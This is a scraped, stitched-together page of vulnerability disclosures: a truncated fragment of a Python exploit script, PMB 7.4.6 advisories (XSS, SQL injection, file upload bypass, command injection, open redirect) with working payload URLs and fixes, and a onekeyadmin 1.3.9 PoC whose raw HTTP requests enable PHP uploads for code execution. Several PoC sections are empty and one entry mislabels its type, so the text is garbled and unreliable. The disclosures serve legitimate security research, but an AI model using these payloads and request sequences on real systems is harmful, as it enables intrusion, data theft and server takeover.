parser.add_argument("--sessions", "-s", required=False, default="/var/lib/php/session/", help="The location where php stores session files.")        args = parser.parse_args()    if(args.url.endswith("/")):        args.url = args.url[:-1]    if(args.sessions.endswith("/")):        args.sessions = args.sessions[:-1]    exploit(args)    passif(__name__ == "__main__"):    main()

CVE-2023-24217: Agilebio Lab Collector 4.234 Remote Code Execution ≈ Packet Storm

PMB v7.4.6 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the query parameter at /admin/convert/export_z3950.php.

To search these vulnerabilities, I use the docker https://github.com/jperon/pmb/ and I simply change the URL in the Dockerfile to match the latest version (7.4.6).

**PMB 7.4.6 - Reflected XSS - CVE-XXXX**

*   Affected version : 7.4.6
*   Vulnerability Type : XSS Reflected (Unauthenticated)
*   CWE-79

**Description**

The web app incorrectly neutralizes user-controllable input before it is placed in output. This allows an attacker to make a Reflected XSS on /pmb/admin/convert/export_z3950_new.php and /pmb/admin/convert/export_z3950.php endpoint via the same query parameter.

**Exploitation**

1.  Go to http://website.com/pmb/admin/convert/export_z3950_new.php or http://website.com/pmb/admin/convert/export_z3950.php
2.  Set parameter command to search and query to a JavaScript payload that end by =or (needed to bypass filter).
3.  Trigger your Reflected XSS: http://website.com/pmb/admin/convert/export_z3950.php?command=search&query=%3Cscript%3Ealert(document.domain);%3C/script%3E=or

**PoC**

Here is an example with an alert box :

**Remediation**

Sanitize the query parameter with htlmentities function.

**PMB 7.4.6 - SQL Injection - CVE-XXXX**

*   Affected version : 7.4.6
*   Vulnerability Type : SQL Injection (Unauthenticated)
*   CWE-89

**Description**

The web app incorrectly neutralizes user-controllable input before it is placed in an SQL Query. This allows an attacker to make a SQL Injection on /pmb/edit.php endpoint via the user parameter. This SQL Injection can lead to an account takeover if the SESSID cookie of the admin account is extracted.

**Exploitation**

1.  Go to http://website.com/pmb/edit.php
2.  Set parameter action=whatever&dest=TABLEAUCSV and user to your SQL payload %27%20OR%201=1;%23&password=password
3.  Trigger your SQL Injection: http://website.com/pmb/edit.php?action=whatever&dest=TABLEAUCSV&user=%27%20OR%201=1;%23&password=password

**PoC**

Here is an example of a simple bypass :

**Remediation**

Use prepared SQL query.

**PMB 7.4.6 - Unrestricted File Upload - CVE-XXXX**

*   Affected version : 7.4.6
*   Vulnerability Type : Unrestricted File Upload (Authenticated)
*   CWE-434

**Description**

The web app allows the attacker to upload or transfer files of dangerous types that can be automatically processed within the product's environment or overwrite configuration files. An attacker can host malicious files (ending with #data-section to make simple the exploitation of the RCE, see the next section).

**Exploitation**

1.  Go to http://website.com/pmb/camera_upload.php
2.  Send a POST request with the parameters upload_filename that is the name of the file you want to upload and imgBase64 the file content to upload.
3.  To bypass the filter in place (image checking), your file need to starts with GIF89a.

**PoC**

Here is an example of a file upload :

**Remediation**

Check the extension of each file. DO NOT trust user input, and generate a random name for each file uploaded.

**PMB 7.4.6 - Remote Code Execution - CVE-XXXX**

*   Affected version : 7.4.6
*   Vulnerability Type : XSS Reflected (Authenticated)
*   CWE-94

**Description**

The web app incorrectly neutralizes user-controllable input before it is placed in exec function. This allows an attacker to execute a shell command through the parameter decompress.

**Exploitation**

1.  Go to http://website.com/pmb/admin/sauvegarde/restaure_act.php
2.  filename parameter need to point to a file that ends with #data-section. The web app use fopen so it's possible to pass a URL to this parameter.
3.  compress parameter need to be 1.
4.  decompress_type need to be external.
5.  decompress it's your shell command. That can the id command.

**PoC**

Here is an example of a blind RCE :

**Remediation**

Never trust user input and if possible do not decompress file with any external command that are controlled by user input.

**PMB 7.4.6 - Open Redirect - CVE-XXXX**

*   Affected version : 7.4.6
*   Vulnerability Type : Open Redirect (Unauthenticated)
*   CWE-601

**Description**

The web app accepts a user-controlled input that specifies a link to an external site, and uses that link in a Redirect. This simplifies phishing attacks.

**Exploitation**

1.  Go to http://website.com/pmb/opac_css/pmb.php
2.  Set from parameter to empty.
3.  url parameter to the URL you want to redirect to.
4.  hash parameter to the md5 of your url parameter.

**PoC**

Here is an example of an Open Redirect :

**Remediation**

Check the domain with a whitelist.

**PMB 7.4.6 - SQL Injection - CVE-XXXX**

*   Affected version : 7.4.6
*   Vulnerability Type : SQL Injection (Unauthenticated)
*   CWE-89

**Description**

The web app incorrectly neutralizes user-controllable input before it is placed in an SQL Query. This allows an attacker to make a SQL Injection on /pmb/opac_css/export.php endpoint via the notice_id parameter. This SQL Injection can lead to an account takeover if the SESSID cookie of the admin account can be extracted.

**Exploitation**

1.  Go to http://website.com/pmb/opac_css/export.php
2.  Set action parameter to export.
3.  notice_id parameter need to start by es after that you can add your SQL payload.

**PoC**

Here is an example of an SQL Injection :

**Remediation**

Use prepared SQL Query or add simple quote in this specific SQL query.

CVE-2023-24737: CVE/PMB at main · AetherBlack/CVE

An arbitrary file upload vulnerability in the component /admin1/config/update of onekeyadmin v1.3.9 allows attackers to execute arbitrary code via a crafted PHP file.

Vulnerability affects product:onekeyadmin  
Vulnerability affects version 1.3.9  
Vulnerability type:Remote code execution  
Vulnerability Details：  
Remote code execution caused by uploading arbitrary files in the background

Vulnerability location  
Vulnerability occurs in  
app\\admin\\controller\\File#upload Although there are restrictions on ext  
  
but we found  
The app\\admin\\controller\\Config#update method can update the limit  
  
  
Vulnerability recurrence  
Conditions Admin  
poc  
The first step is to update the configuration to allow uploading php files  
\`POST /admin1/config/update HTTP/1.1  
Host: 192.168.3.129:8091  
Content-Length: 398  
Accept: _/_  
X-Requested-With: XMLHttpRequest  
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36  
Content-Type: application/json;charset=UTF-8  
Origin: http://192.168.3.129:8091  
Referer: http://192.168.3.129:8091/admin1/config/index  
Accept-Encoding: gzip, deflate  
Accept-Language: zh-CN,zh;q=0.9  
Cookie: .AspNetCore.Antiforgery.WE9Ryc20IQg=CfDJ8HxjCh0oOylDk40Utlg0kuUFWVLtvNW\_C4pGl8LD435wIbnnMrZdOHOVRm58Tf9ea-RLT8Cp1rFj-RWlZ5XrTw9-pVKvbqtZLLUaL1326gsyfJyfQ4k6KDwnwVkIpwADhj\_KGa\_UpcDu8IqL7EsVtWw; .AspNetCore.Session=CfDJ8HxjCh0oOylDk40Utlg0kuXb68MZjsW%2FxifhC6RHBoXE9qf6bZAULAztKWrxdQ9IBGV%2FMomSXYW%2BGJr9gVN1G67kZ5ZHUvzZTEMIYQoRouYf9upg6F4i%2BhutGrGde7h3SIdWEXSN5b50ouWrN9AG8MmS%2FGz8y0InZBJWSgEn5O55; .AspNetCore.Cookies=CfDJ8HxjCh0oOylDk40Utlg0kuXw6Bar2FloCPnRmIK8z27i1l1eQZE9H20ZfZqx9xSA5gVSrZS5hfpqeu4tILEhHunDaAOIqfEmmxsRNV2SMHnwXt\_-X0kdVf67A8e1MWMxP-p-tuJZSsa7zVQwOFqTVBFHpgk2dGT3N2U0Th0WR3lQUMdM42wC-XbWYchKNG\_fiMCNOPg2MXOFaBmuPreHzuI2wxc-a8KiA7afrdzzz4BnurbEbl8aR8DL0WYq8jFHxZdo1RwJwXULO2qvHYIQzgjZvELBShr4j8C6FJ82VBL5Gq3zFSHAJZ0ddy2q9M0cLUVM4alP8kmxfwfeaVHMZR1cS3\_WwDQz5hvGNQuVwIijYdb4HUUpYTKZh2hs\_j-o0joMSDe7mdS\_3rTvyQ5errD\_GkyZZnZL7qZ2jydHhlZMa2vPLOHmLFan6WXhtTk0E\_1-zYB117H7tFTA\_jJGaNrPVYEuQmmSuBf3kwlWwV1TfGQYL7dPbZDscJdMhn34YnL3LvBlWmY6wRO1ZkZrLmRSsIzcWL7PKHaELAXf8VHz; PHPSESSID=c54fdf181caff75fbd613da826c6e9ae  
Connection: close

{"title":"涓婁紶闄愬埗","name":"upload","value":{"admin":{"ext":{"image":"png,jpg,jpeg,bmp,gif,ico","video":"mp4","audio":"mp3","word":"docx,doc","other":"swf,psd,css,js,html,exe,dll,zip,rar,ppt,pdf,xlsx,xls,txt,torrent,dwt,sql,svg,php"},"size":{"image":10485760,"video":104857600,"audio":104857600,"other":104857600,"word":104857600}},"index":{"ext":{"image":"png,jpg"},"size":{"image":2097152}}}}<img width="980" alt="image" src="https://user-images.githubusercontent.com/122217858/211447647-7117f5e5-30ef-4b7e-a730-02e0c5862a2d.png"> The second step is to upload malicious filesPOST /admin1/file/upload HTTP/1.1  
Host: 192.168.3.129:8091  
Content-Length: 280  
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36  
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryARP8fRC2kb4GP3oP  
Accept: _/_  
Origin: http://192.168.3.129:8091  
Referer: http://192.168.3.129:8091/admin1/file/index  
Accept-Encoding: gzip, deflate  
Accept-Language: zh-CN,zh;q=0.9  
Cookie:PHPSESSID=c54fdf181caff75fbd613da826c6e9ae  
Connection: close

\------WebKitFormBoundaryARP8fRC2kb4GP3oP  
Content-Disposition: form-data; name="name"

templatex  
\------WebKitFormBoundaryARP8fRC2kb4GP3oP  
Content-Disposition: form-data; name="file"; filename="1.php"  
Content-Type: text/php

\------WebKitFormBoundaryARP8fRC2kb4GP3oP--  
\`

Tag

#php